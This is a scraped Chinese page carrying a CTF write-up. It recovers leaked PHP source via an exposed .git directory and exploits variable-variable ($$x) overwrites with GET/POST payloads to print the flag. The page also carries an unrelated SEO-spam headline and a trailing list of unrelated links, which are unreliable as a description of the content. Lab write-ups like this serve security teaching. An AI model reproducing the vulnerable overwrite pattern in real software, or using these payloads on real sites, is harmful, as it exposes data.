当前位置: 首页 > news >正文

织梦做的网站怎样网站上的logo怎么做

织梦做的网站怎样,网站上的logo怎么做,平顶山网站建设价格,湖州本地做网站打开题目 发现这么多链接,以为要一点点去找功能上的漏洞。当你源代码,dirsearch,抓包等等操作之后,发现什么都没有。所以这题又是一道源码泄露题,上GItHack。扫描结果如下 http://63f29a80-e08b-43ae-a6d0-8e70fb02ea…

打开题目

发现这么多链接,以为要一点点去找功能上的漏洞。当你源代码,dirsearch,抓包等等操作之后,发现什么都没有。所以这题又是一道源码泄露题,上GItHack。扫描结果如下

http://63f29a80-e08b-43ae-a6d0-8e70fb02eaa3.node5.buuoj.cn:81/.git

主要代码在index里面

<?php
 
include 'flag.php';
 
$yds = "dog";
$is = "cat";
$handsome = 'yds';
 
foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}
 
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
 
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
 
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
 
echo "the flag is: ".$flag;

根据源代码,需要通过get传参达到变量覆盖的目的。 

?yds=flag

覆盖is变量

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

Get或Post传入flag=flag,触发变量覆盖代码

foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}

输出?is=flag&flag=flag

再覆盖覆盖handsome变量

handsome=flag,得到$handsome=$flag

?handsome=flag&flag=handsome

可以得到flag

http://www.yayakq.cn/news/661772/

相关文章:

  • 花店网站模板做论坛网站 备案
  • 建怎么网站比较赚钱太原制作微信网站
  • 网站网站开发逻辑友情链接方面
  • 超大网站制作素材吴中区做网站
  • 服装租赁 网站 php微信运营推广方式
  • 如何做网站卖衣服公司建设网站需要注意什么
  • 高大上网站设计dede网站改成自适应
  • 请求php网站数据库上海正规网站定制
  • 网站的后台管理账号和密码哔哩哔哩网站免费进入
  • 网站seo课程网站 锚点链接怎么做
  • 云浮源峰网站建设工作室地址曲靖市建设局网站
  • 网站制作备案上线流程网站后台logo
  • 南京做网站具体需要多少钱如何实现网站生成网页
  • 上海做网站的小公司有哪些如何推广自己的网站
  • 潍坊城市建设官方网站深圳品牌官网
  • net网站开发JD除了WordPress等
  • 大型网站开发流程和步骤南昌网站建设模板网络公司
  • 东莞家用台灯东莞网站建设新手自学做网站多久
  • 网站赏析企业网站宣传方案
  • 做专门的表白网站大学生网站建设
  • 商城网站设计定制企业建站网站建站系统
  • 中山市网站制作建设网站只
  • 无锡中小企业网站建设网站建设的基本流程和步骤
  • 网站死链接所有的竞价托管公司
  • 网站的外链是怎么做的青岛做网站哪家做的好
  • 设计一套网站费用线上企业订单管理系统网站
  • 网站建设hengfengera新媒体运营面试问题
  • 网站做树状结构有什么作用网站建设与管理自考题
  • 车机油哪个网站做的好网站开发流程主要分成什么
  • 网站怎么做缓存南阳设计公司排名